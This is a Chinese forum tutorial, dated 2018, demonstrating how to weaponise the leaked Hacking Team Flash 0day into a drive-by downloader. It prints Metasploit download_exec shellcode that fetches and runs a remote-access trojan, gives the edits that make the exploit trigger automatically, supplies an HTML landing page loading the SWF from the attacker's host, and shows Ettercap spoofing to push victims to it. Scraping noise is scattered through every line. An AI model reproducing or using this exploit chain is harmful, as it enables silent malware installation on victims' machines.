|
( Y% t) W: h) Q/ i2 ^ 三、flash 0day之手工代码修改制作下载者实例入侵演示
3 @) O/ a. w" }& H
+ R4 u" a. M! W: S# A) m1 B. [ M% s1 f* }
利用到的工具:
: s/ i, U* O8 @) e/ T # g" d# f3 a3 s, |
; x$ h; Q% l, d) g1 h0 c" l- J
Msf
* C6 [# C' `- M% s
& T0 V+ o* L. L& q% i0 G9 S n/ e* N- {5 ?6 ~' Q8 X; ?
Ettercap 7 j; i, C3 C3 p$ E
* ^# r. a7 n- n- Q1 b. X
! U N5 e& \& A$ ^3 V" D
Adobe Flash CS6 $ I4 U' X0 O1 d
! @" d6 W$ h& M
& S4 ^( P4 P; [ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
% k; I* S, D4 l+ c" v( Z4 X 7 d0 k7 ?6 S6 B+ j. x
0 `, J; b# f) f+ \3 F9 p5 V
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
" _# ~% o! U4 g5 m
( j+ q. k; X1 }& E
. d! M, X& L; }! a 如图:
0 y+ B5 L/ A9 S
; ?. U- U% O* q7 Y: p. j: @5 a! p. B. m7 N4 j9 V9 N: h6 L
7 w& J* y5 T( e 7 h8 K2 }, h; j* r& {1 ~
* j+ `) C) H3 a0 A1 r' ~9 U 
9 r6 e/ O. E+ d" Y$ T9 ^ ) F3 N+ k4 x' j. p
L, p4 o/ B* A; @1 ^( i3 t! t
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + A4 z( s: [2 l7 s7 L Q; b2 W
; H+ T& z( O; t3 a, ?) z, e& h6 v" s9 |% H- {5 h! H% v6 f6 S
$ u9 U1 `2 S( V; a% |
3 d& f2 C0 }. _4 T! g' D3 H' f" T% C, k
6 [/ ]6 ]) u8 r9 v5 D
 # l7 i$ S% M% j, p5 I2 G3 y h* N
" B. q4 E9 R; u. }$ c/ h/ m( f' a, P5 |" h' ]7 }% N; q
然后执行generate -t dword生成shellcode,如下: ; L% o7 b* T `3 E
+ j# [0 Z* g/ z" |
/ l) D5 d* x f 
9 L. R# m a( ]& y / N. i6 o& @% Z
6 r; y3 P% t# \, r4 m1 l8 u/ m, [9 @
复制代码到文本下便于我们一会编辑flash exp,如下: & E/ Q g: U& m- M& N0 \
/ J; d, S7 l$ L" M$ q2 H6 d5 j2 s/ n8 W' Q D7 D1 U% A4 L/ v0 j4 f# a
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
/ T' g/ q' m. f' N9 ]& C
. I5 ]( M4 r4 t* _" z
( K, f- ~8 u( ^! h0 ~: u" a 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 2 e9 q+ ^( m$ u4 {& i( p5 q
2 _* o4 A9 D4 Y; w% b5 X8 k+ O. `: T9 k5 ~* ^
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
8 {( p; m6 x x, ] x$ B# H/ a. M0 ^4 W4 Z
2 Y9 o ?# X5 R% a: L& c
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, + l5 ~; Z+ E& W; [4 W3 S* T$ J( M
; l+ W5 _7 I5 C, z. Q$ Q9 z
4 K3 K' V; O$ V& z# c 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
/ {2 _$ q7 t4 s. Y1 D* x # ]; X u- H& }: ?7 U
& N, V9 e# _% ^! L
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, * H, T( A7 z/ v1 R4 `0 K9 a' w1 [
" f: W" v9 o& H% J7 P
8 m9 K) G, N) r
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 N5 W4 f* O5 i
7 f/ m! L& c2 t) r/ Q- n) {
; Y$ }& g3 o- H) O 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' L( [& @$ X/ |
, z2 M; z5 u* f
, c; l6 w% q9 W" Z: `- F- |
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, _# [" }, }& c0 p1 Z* d
: E) h% |3 j( Z$ `4 Q: `8 [9 Z' @- W2 f1 R) ^8 \ I0 k0 Z9 H
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, : v9 j/ g0 y e/ m
4 F: Q3 F" n: W0 H1 Y( N; F! z$ H
+ F+ M$ T% O5 Q 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
. G5 y7 Q8 p! s' w9 V& ~/ {
0 K% ~ h8 M) `2 u; j
: T3 x7 H: {1 A: W/ v3 l! l( J 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ; ]" g" I; m' L$ j9 q
; R. L. Z) G& r
% |% b s- k* ?! r/ _ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
5 C6 E: e$ Y5 a4 C; j+ u5 D
8 t7 M: q T4 r2 O2 U- m! C0 ^8 I$ H' R% A1 m! Y
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
9 ]4 w; c0 {, ^+ y+ Z7 c
8 p- `* z, W5 U$ z! m
- N& K7 B {* R) M$ A6 p) r( ]
; U l* V# }# S# p . S% ]9 A0 z5 D% C+ C" O% U
2 @9 F0 I+ C6 L1 t8 g
* H% f% c% m: {# H7 H8 I
, j0 {" O6 w1 c" l7 E3 s; f) R( E+ J9 S1 w3 Y
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
, W1 H' |; @0 }7 I# \6 \
- P' U# f' U! V3 V8 E$ @7 R4 ?7 t8 B/ z
 % }! R+ _7 q0 i$ r$ S0 b* }
- D) ^; S& u8 t6 D9 C" \" E, M1 C% V9 @6 v5 p- H: t$ Z) p. V/ G6 k8 y
先修改ShellWin32.as,部分源代码如图: $ X' F1 @3 b/ i" I, N9 V3 i
! y( {- O, N- w, I( M& E
7 N6 d. z3 F! y0 v' h
& v" T8 R0 G/ ~; C; x5 Y! T8 P: s 4 V' A0 ~ r" n$ C' j& \
4 c( r- W+ ^6 a" s. i 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
5 A6 J3 D- Y | K
. n! ~( j4 K3 [: u' X
+ s3 Q3 `/ f7 B9 Z9 v9 g  ( t% e7 }" Q9 X' D* N2 w* O
( l( Q) s8 U6 Z" H4 I! [8 |- Y
/ Y% A) J+ F7 \% I5 q0 T' i
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
: `9 E. V. a- t$ ~! X4 S0 N
# X8 \& X1 [9 O8 A! H. f1 G0 z1 Z; C) u6 l" u
" k* ]5 Y$ x. E* s6 h: w8 w) T* H
/ I. }. y# u9 p1 g+ K' ]+ f. u6 c4 e0 [& R6 ^
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 8 v/ g+ F: J2 |
* [7 e* p0 @& t" I7 S( E6 a% Q) H. n- n) @
8 S; b' O5 Q4 G/ Z2 P5 ^
2 O2 @+ M7 O# L
$ ~2 e+ {" A1 E; `' S& ? 3 y3 c2 L8 u5 v) Y0 e/ x
9 ~4 S; p/ n8 j" B- }, s D$ X+ \/ x
8 A% a5 Z+ e, K& Q+ w, T
 N9 X* ^- V/ O9 A/ a& p6 K
Z" t/ f- _5 ?- W" N
. z: m- ^- ~0 d+ i2 R, J 然后点保存,下面我们来编译一下,打开
3 Y5 M2 x- U3 u " ?( k/ b/ M4 n
: n( W$ x R4 |" |! x8 h' {
exp1.fla然后点文件-发布,看看编译没错误
; l5 j) }+ z1 Y5 x+ T5 R6 s 0 }% V" O) ]7 |4 T& w& s, P# F1 z3 a
7 U X( S8 i, u0 @ Q0 X
1 L* W' R7 i, x7 s* r4 O$ a
% k+ O6 H. T7 H1 p4 K* K8 B( z2 R$ S% W1 r, T
3 r# }. u+ L; L; ^1 M( d s$ g+ W1 c; d3 h, m) |5 T
+ I2 l. F: ?- ] `, I
+ f. @. @6 i+ |) k( a, [ A. L" f' p) L L' I! x: H/ q
# n; s1 d, s9 X; I e8 i% h) F* M, ` 
" h7 K* s% l- y! U' ] " `2 {$ t( z" ~ O; X, Q/ F p$ Y% u
2 ^" f2 X% z2 L% l0 N, e
然后我们把生成的 % T5 o* ?& q! C+ ~+ K
. M, X+ e) ~0 Q6 i0 k
( P9 x8 j* |) s* l+ F& h exp1.swf丢到kailinux 的/var/www/html下: 2 y) s5 W4 _- g6 R5 h) k* l0 v' l( v
+ P4 [' ]6 T5 v6 `* a$ `
: q( K/ V6 X& j+ Y0 }# ~ 然后把这段代码好好编辑一下
0 x0 M: N4 H; M9 f8 R; R3 z& e$ s 9 M6 u. h, z' w l$ e7 r* X/ e0 ^
8 `/ [3 n1 C/ m: V- q! a
z8 A9 X( D$ [6 z8 X, d* L
/ J, H: ~1 u1 n) P
& r; x( S# q3 g: e# L1 L" ? ! P6 c% ^3 R5 O, n8 c
) I0 D1 ]4 }* F: i7 h8 z2 |5 W3 o9 _) H0 k
8 C( b" t4 `( [" w
% \: ~4 r* E1 `
/ }% b/ D+ u- x. d$ _2 {# A. [
0 Z Y& f; l4 S. x3 a8 E8 Y& l3 W( g
, O5 O* ` L. I) R( y7 j2 @( ~& ~
) N7 U: J) C& S# v6 K
: M4 H- V3 v/ T3 B
0 Y% T8 t# J' R. H0 R$ y$ z M/ P1 Z6 |1 Q+ G5 Q+ V' w
) d! ~/ ]; ^, G3 l: D$ ?7 g9 _
( G* X( R. o9 J5 y' z+ I
9 z' G+ Z% n$ x <!DOCTYPE html>
: q+ N8 A5 |# [" u' Z8 B: Y9 A
* d# ] S: n# }- B3 @2 B: n' [" O. D5 U+ W& ^8 \% P7 _
<html> 0 ?+ c+ N- W7 z- }- ~& h2 n) r5 ~
% \- G5 d7 Z( H. z! } [" I
/ ?% r1 O/ K/ A4 m4 ^3 f <head> * p! Q( f6 @0 @
. ?" ?! v9 I, M& M0 k8 p
! `7 M1 @! x( W! c% K% ^ <meta http-equiv="Content-Type" content="text/html;
; ~4 B0 ~2 l+ c: p0 P
* {" V |! B; u2 S" _
3 e0 f8 ?3 K: h0 _- A' _- J charset=utf-8"/>
. H3 u& h8 j" f6 C& @ 8 I* K* @2 b! k' {+ H) C# R8 H
! F) ?. ?! G. t! Y </head> . h: k4 U+ h& i" m% H* {
3 i p2 d' Y; V7 z1 J* s6 f
1 U5 v9 V1 q5 S8 f3 M s, b <body> # ]' h2 d# ~: w& D
9 D/ }* S& D5 W+ n/ g- s" L9 ~
. I: }- ?0 U, t. U5 X
<h2> Please wait, the requested page is loading...</h2> , h9 h4 ~! n! I8 C: Z+ C6 k. F
6 J6 Z1 R) H0 _( l4 K
' [# Z9 N5 C3 S A- a <br>
, A' A( j) j: t$ D4 w i2 i! P
* I" L/ @! q+ x# g8 ]
! h* r* p: m) s <OBJECT
$ p2 p2 Z: x/ s. V5 p' b9 a
6 g6 P' S5 M0 d' Y" C T' l+ B# U/ t2 G2 m6 B6 I( w0 O
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 0 Q/ f. c0 s3 [$ M
6 L5 A/ D. c2 A b0 F1 T) N! ^; c; v) {2 g8 r
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
4 U$ P1 T2 A$ c$ z# i8 j% `
1 D7 z" ]; \$ A9 a3 E+ {: R% ~' P& [$ m" }8 J
</body>
5 L0 p# c0 o" Z
( k, |% r+ H& ^# L/ \. F& Z$ i, ?: R
<script>
v) P' V+ q: x 4 M# r, k3 v6 ^" }( y: \4 B
6 _. I: E* B; y) @
setTimeout(function () { & P' [8 Q- b$ l/ K; ~" K
9 B1 b- W8 B% A) B# u) F. N9 ?
1 Z. H0 }% x3 J: H 0 V6 H6 R8 _. a. y3 f n7 X
0 I6 O! M- R, J9 c( P, A6 Q" [# s( W2 d1 ^- b" a
window.location.reload(); 8 g# m, [% L- f: s* K/ Y
0 k. F# m# P: L" R! v5 K t
/ L4 V% Q( f$ p# `( @6 ` }, 10000);
' I" a4 w' O6 H* S! E m ( @* T% b l4 V' f, Q
4 {) k& z/ z1 t) N
% f5 k3 t; `! u, B `. ~
7 j4 W1 L, f4 ^9 w* Z" F8 R/ ?0 }5 P( e! Q
</script>
5 c4 t3 u6 I- W7 M# @; S7 u2 I ) J* @, v. r' L, k# u
/ {+ m# K. L+ U0 V6 L% { </html> 6 T) m% h7 d0 j0 W7 l6 t2 U
4 P) L q; d% O5 }% q- M, n5 k
% A. P, A+ o [7 W8 D
1 Q" k4 x5 V" e, {0 j' }+ { 5 u* z, e l" z1 ?3 m N7 K* R
) D0 [' _" F+ O2 s5 y6 ^) `
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
$ z" M& j" ` q* Z$ r C! g
, l7 @# o3 C7 H2 a& r) s( U8 ?" g% B4 ~0 b2 R
( T/ e2 [: i& x; ^ 7 k0 G1 N6 b+ O
6 @. X* ~( ^. G! D
8 E* y4 f; [5 o$ H. B
4 T' u" B* P1 g! N( z5 ?$ h1 q6 ~; F1 b- u( u) r
, c( A" J2 @& e f4 b
6 b% z$ N) Q9 |% b. @9 c* Z: J
8 e* \0 F9 p' p. i . G8 D+ X& m+ u1 q0 V
3 N: ]8 `" q$ y0 D; h8 F( a5 `+ T( a; p+ j7 t/ K& v
: l2 m" N! N+ P$ T
; T; A& m4 S; i6 @: \ @7 j9 p) J [% D# O; o n, c0 c& Z
下面我们用ettercap欺骗如图: 8 }7 U4 K$ k1 r" S% k/ ]
9 P. F' d+ v% `6 F
; `3 i8 U, a7 r+ {/ e1 @; N
 # ~; |3 W+ S; l" L9 d, y% [4 I
- q3 F/ E3 b9 v" d5 a
* m# ]4 z; x- E; w3 m
* {9 u% t3 W3 m& z& u; j
3 \7 q6 U& ]. j5 j" N B
, \3 V" O% \6 U 下面我们随便访问个网站看看: . b0 s7 ~# u" f" d5 J! {& G; T
7 c( g6 y. F: F
% Y: |3 k( V( { q 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
7 l) `* j* Q9 E# G+ `! ^4 S- x7 b 8 F4 H( v5 f1 H5 T, g( h) H
% x1 S" L. ~5 p 
1 q6 O. J3 A# R* ^$ x8 q
! }' G' Q9 y$ U+ h! o* i9 ^, _9 @' h- X3 _. S
我们看另一台, 3 K' k7 H2 @) [, @. i9 g5 z
: r! a4 p/ u# G3 W
) D5 J5 j! K2 Q/ N
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
4 L* I. ?9 P; r& t2 T- z | 
发表于 2018-10-20 20:28:55
收藏
支持
反对